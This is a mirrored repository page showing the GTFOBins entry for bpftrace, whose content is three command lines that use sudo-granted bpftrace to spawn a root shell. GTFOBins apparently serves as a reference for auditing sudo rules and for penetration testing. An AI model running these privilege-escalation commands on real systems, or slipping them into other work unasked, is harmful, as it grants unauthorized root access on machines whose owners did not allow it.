This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-30 16:28:45 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
01d4de40d2ef5a30f31f43269b58cf84c9fd3cca
GTFOBins.github.io
/
_gtfobins
/
bpftrace.md
Andrea Cardaci
1f9dbbf6eb
Improve bpftrace sudo shell
2020-01-03 14:11:37 +01:00
260 B
Raw
Blame
History
functions
functions
sudo
code
sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}'
code
TF=$(mktemp) echo 'BEGIN {system("/bin/sh");exit()}' >$TF sudo bpftrace $TF
code
sudo bpftrace -c /bin/sh -e 'END {exit()}'
Reference in New Issue
View Git Blame
Copy Permalink